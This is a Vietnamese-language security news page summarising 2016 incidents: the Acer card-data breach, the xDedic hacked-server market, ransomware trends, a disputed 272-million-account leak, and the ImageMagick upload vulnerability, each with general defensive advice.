Hiện không rõ các hacker đã làm thế nào để xâm nhập được vào các máy chủ của Acer. Phía công ty cũng chỉ cho biết đây là kết quả của một vấn đề an chưa được xác định rõ ràng. Trong tài liệu gửi tới Phòng tư pháp bang California, Acer cho hay: “Những gì chúng tôi biết là hacker đã lấy được dữ liệu trong thời gian gần một năm từ 12/5/2015 đến 28/4/2016”.

Acer
Acer cho rằng dữ liệu bị đánh cắp do công ty đã vô tình lưu trữ dữ liệu đó dưới dạng không an toàn. Kết quả là hacker có thể truy cập vào những thông tin nhạy cảm của các khách đặt hàng mua sản phẩm của hãng trên website trong khoảng thời gian từ 12/5/2015 đến 28/4/ 2016.
Vụ việc lộ thông tin của Acer có ảnh hưởng trực tiếp đến khách hàng, bởi các thông tin bị rò rỉ có thể cho phép hacker gây các tổn hại thực tế. Tên, địa chỉ, số thẻ tín dụng, ngày hết hạn hay mã số an ninh CVC chính xác là dữ liệu cần có khi kẻ xấu muốn thực hiện hành vi gian lận thẻ tín dụng. Thật may vụ việc mới chỉ ảnh hưởng tới một số lượng nhỏ người mua sắm. Tuy nhiên qua đây cũng cho thấy dù bạn có cẩn thận với các dữ liệu trên PC cá nhân thế nào thì vẫn có những vụ tấn công nằm ngoài tầm kiểm soát của bạn.

Tham khảo tài liệu Acer thông tin đến khách hàng : https://oag.ca.gov/system/files/Customer%20Notice%20Letter%20-%20California_0.pdf?

Trên 176,000 Hacked Servers đã được bán trên chợ đen xDedic

Trên 176,000 Hacked Servers đã được bán trên chợ đen xDedic
Tuần trước, 16/6, các nhà nghiên cứu tại Kaspersky Lab công bố nghiên cứu về xDedic, chợ đen buôn bán quyền truy cập vào các server hacked chỉ với giá 6 USD cho mỗi quyền truy cập.
Tổng số quyền truy cập máy chủ bị rao bán là 70.624 từ 173 quốc gia, trong đó Việt Nam “góp” vào đây 841 máy chủ bị hack (đứng thứ 27). Đứng đầu danh sách là Brazil, Trung Quốc, Nga, Ấn Độ, Tây Ban Nha.
Đây dường như chỉ là phần nổi của tảng băng trôi, số lượng server hacked thực sự đã được mua bán trên xDedic từ khi nó mới xuất hiện 10/2014 cho đến khi nó bị đóng cửa 02/2016 lớn hơn vào khoảng gấp 3 lần. Mỹ là quốc gia có số lượng server bị hack được rao bán trên xDedic với 60,081 trường hợp, tiếp đến là United Kingdom với 8,817 servers, Brazil (8,770 servers), Canada (6,112), France (5,973), Spain (5,954), Australia (5,855), Russia (5,608), Italy (5,536), và Germany (4,988).
Dựa trên dữ liệu mới thì US chiếm 34% số lượng server bị hack, trong khi UK và Brazil chỉ vào khoảng 5%.US, UK, Canada, và Germany nằm trong top 10 quốc gia bị ảnh hưởng. Server đắt nhất được rao bán giá $6,000 , khoảng 50 server có giá trên 50$ và tất cả đều nằm ở US.

Đại diện của Kasperky Lab cũng cho biết, xDedic là một ví dụ điển hình cho kiểu chợ đen mới của tội phạm mạng: được tổ chức và hậu thuẫn tốt và cấp quyền truy cập dễ dàng, nhanh chóng vào hệ thống tổ chức hợp pháp với chi phí thấp cho bất k​ỳ tội phạm mạng nào.
Chỉ từ 6 USD cho mỗi máy chủ, thành viên diễn đàn xDedic đã có thể truy cập vào tất cả dữ liệu của một máy chủ và sử dụng chúng như nền tảng để tấn công về sau, có thể bao gồm tấn công có chủ đích, phần mềm độc hại, DDoS, lừa đảo bằng email, tấn công bằng kỹ thuật xã hội…
Đáng chú ý, chủ của những máy chủ hợp pháp, các tổ chức có danh tiếng bao gồm mạng lưới chính phủ, tập đoàn và trường đại học thường không biết rằng hệ thống công nghệ thông tin đang bị tổn hại. Hơn nữa, khi chiến dịch hoàn thành, những kẻ tấn công có thể quay lại truy cập vào máy chủ dự phòng để lấy thông tin đem rao bán…
Phía Kaspersky Lab khuyến nghị các tổ chức nên cài đặt giải pháp bảo mật như một phần của hệ thống bảo mật công nghệ thông tin toàn diện và đa tầng; buộc sử dụng mật khẩu có độ mạnh cao trong quá trình xác thực máy chủ; liên tục thực hiện quy trỉnh quản lý các bản vá lỗi; kiểm tra bảo mật hệ thống thường xuyên./.

Bài tham khảo:https://securelist.com/blog/research/75120/the-tip-of-the-iceberg-an-unexpected-turn-in-the-xdedic-story/

Kaspersky Lab: ransomware mới được phát hiện gia tăng 14% trong quý 1 năm 2016

Mối nguy hiểm ransomware vẫn tiếp tục gia tăng trong 2016.

ransomware
Theo báo cáo các mối đe dọa trong quý 1 năm 2016 của Kaspersky Lab, các cuộc tấn công ransomware đã tăng 30 phần trăm so với quý trước.Trong đó bao gồm một sự gia tăng 14 phần trăm “phần mềm độc hại ransomware đã được sửa đổi” hoặc các biến thể mới của các phần mềm độc hại.

Hơn nữa, các cuộc tấn công ransomware, 17 phần trăm nhắm mục tiêu các khu vực doanh nghiệp, trong khi những thiết bị di động là mục tiêu đã tăng 40 phần trăm so với quý trước.

Top 3 dòng ransomware hàng đầu trong quý này, theo Kaspersky, bao gồm Teslacrypt (58 phần trăm), CTB-Locker (23 phần trăm), và Cryptowall (3 phần trăm), trong đó lây lan qua file đính kèm email độc hại hoặc các trang web bị nhiễm mã độc.

Trong khi đó, một ransomware mới, được gọi là Petya, cũng được phát hiện. Không chỉ nó mã hóa dữ liệu được lưu trữ trên máy tính,nó còn ghi đè master boot record của ổ đĩa cứng, ngăn chặn các máy tính bị nhiễm khởi động vào hệ điều hành.

Hacker tiếp tục khai thác Adobe Flash Player, Microsoft Office và Java để lây lan malware.

Full Report của Kaspersky xem chi tiết tại: securelist.com

272 triệu tài khoản bị hack, Google cho biết: 98% tài khoản không có thực

272 triệu tài khoản bị hack, Google cho biết: 98% tài khoản không có thực

Đầu tuần này, Một công ty bảo mật công bố hơn 272 triệu tài khoản email đã bị tin tặc đánh cắp và đang được rao bán trên “chợ đen” tại Nga. Trong đó, phần lớn tài khoản đều thuộc Mail.ru và một số ít của Google, Yahoo và Microsoft.

Hack email password

Hack email password

Xác minh báo cáo này, Google cho biết: “Hơn 98% các thông tin tài khoản Google trong nghiên cứu này hóa ra là không có thật”, mà theo như trong báo cáo này số tài khoản bị hack lên tới 23 triệu tài khoản gmail.

Riêng, Mail.ru, nhà cung cấp e-mail lớn nhất của Nga, đã nói rằng hơn 99,98 phần trăm các thông tin nhận được hóa ra là tài khoản không hợp lệ. Gần 23 phần trăm địa chỉ không tồn tại, và 65 phần trăm của các tài khoản được liệt kê chứa mật khẩu sai, 12 phần trăm của các tài khoản còn lại đã bị tạm khóa bởi Mail.ru.

Yahoo Mail có 40 triệu tài khoản được công bố cũng đã điều tra và họ không tin rằng có bất kỳ rủi ro đáng kể cho người dùng của họ:
“Our security team has investigated and we don’t believe there is any significant risk to our users based on the claims shared with the press. We always encourage our users to create strong passwords (here are some tips), or, even better, eliminate use of passwords altogether by using Yahoo Account Key.”

Microsoft Hotmail, theo Reuters là nhà cung cấp có 33 triệu tài khoản bị hack, vẫn chưa có bình luận công khai cho sự việc này. Nếu họ tìm thấy thậm chí ngay cả một phần mười số tài khoản bị hack, họ sẽ ngay lập tức yêu cầu reset mật khẩu bắt buộc và sẽ được công bố rộng rãi.

Mặc dù vậy, nếu bạn đang sở hữu những thông tin quan trọng từ các dịch vụ thư điện tử như Yahoo, Gmail hay Hotmail thì bạn cũng nên áp dụng những biện pháp tăng cường an ninh cho passwords của mình.

Theo Arstechnica

Thư viện xử lý ảnh ImageMagick dính lỗ hổng, hacker có thể tấn công trang web qua hình ảnh tải lên

Các nhà nghiên cứu bảo mật đã phát hiện ra rằng ra rất nhiều trang web đang ẩn chứa lỗ hổng bảo mật khiến hacker có thể dễ dàng thực thi mã độc qua hình ảnh được đăng tải. Lỗ hổng này nằm trong ImageMagick – một thư viện xử lý hình ảnh được sử dụng phổ biến và được hỗ trợ bởi nhiều ngôn ngữ lập trình như PHP, Ruby, NodeJS, Python … Nhiều trang mạng xã hội, blog và nhiều hệ thống quản lý nội dung của các trang web khác vẫn đang khai thác ImageMagick một cách trực tiếp hoặc gián tiếp để thu nhỏ kích cỡ hình ảnh khi người dùng tải lên.

Imagemagick

Theo nhà nghiên cứu bảo mật Ryan Huber, ImageMagick đang tồn tại các lỗ hổng cho phép những hình ảnh chứa mã độc ép buộc máy chủ web thực thi một đoạn mã được hacker soạn sẵn. Các trang web sử dụng ImageMagick và cho phép người dùng tải ảnh lên đang đứng trước nguy cơ bị tấn công rất cao và có thể mất quyền kiểm soát bảo mật hoàn toàn.

Huber cho biết các lỗ hổng của thư viện ImageMagick rất dễ phát hiện và rất nhiều người có thể đã truy xuất vào lỗ hổng này khiến cho vấn đề trở nên nguy cấp đối với những ai đang sử dụng phần mềm này. Trong khi đó, đơn vị quản lý ImageMagick cho biết họ đã được biết về nguy cơ lỗ hổng bị hacker khai thác để thực thi mã độc từ xa. Tuy nhiên, họ vẫn chưa đưa ra bất cứ bản vá nào, chỉ gợi ý rằng quản trị viên các trang web nên bổ sung thêm một vài đoạn mã vào các file thiết lập để chặn bớt các lỗ hổng tiềm năng. Huber cũng đưa ra những khuyến cáo tương tự và đóng gói thành một file (tải về tại đây) nhưng gợi ý thêm rằng các trang web đang sử dụng ImageMagick nên tiến hành kiểm tra đối với tất cả hình ảnh được tải lên ở cấp thấp, bắt đầu với những byte ký hiệu tương ứng với định dạng hình ảnh trước khi cho phép ảnh được xử lý.

Các lỗ hổng trong ImageMagick được phát hiện bởi nhà nghiên cứu bảo mật Nikolay Ermishkin.

Một trong những tình huống tấn công khai thác lỗ hổng này là các trang chia sẻ nội dung số, mạng xã hội, dịch vụ blog hay trang tin tức sẽ chấp nhận những hình ảnh được tải lên từ một người dùng (có thể là hacker). Hacker sẽ tải lên một file có định dạng png, jpg … hay thông qua các nội dung có định dạng khác. Một khi ImageMagick phát hiện sự bất tương đồng về định dạng, nó sẽ tự động chuyển đổi hình ảnh thành một định dạng trung gian và trong một số trường hợp, nó sẽ tự tạo ra một đường dẫn giải mã không an toàn. Lúc này, mã độc có thể được thực thi trên máy chủ web.

Huber cho biết các giải pháp mà ông đưa ra có thể hiệu quả trong việc ngăn chặn nhiều hình thái tấn công đã được biết đến nhưng không đảm bảo có thể loại bỏ tất cả. Chỉ đến khi lỗ hổng được phân tích toàn diện thì các giải pháp hiện tại chỉ mang tính tạm thời. Điều này có nghĩa quản trị viên các trang web cần phải giám sát lỗ hổng này chặt chẽ và sẵn sàng triển khai các giải pháp bảo vệ nếu cần.

ImageMagick hiện đang hỗ trợ hơn 200 định dạng khác nhau, bao gồm cả định dạng nroff và postscript. Về lâu dài, quản trị viên các trang web được khuyến cáo nên chuyển sang sử dụng GraphicMagick – một nhánh của ImageMagick hỗ trợ số lượng các định dạng file ít hơn.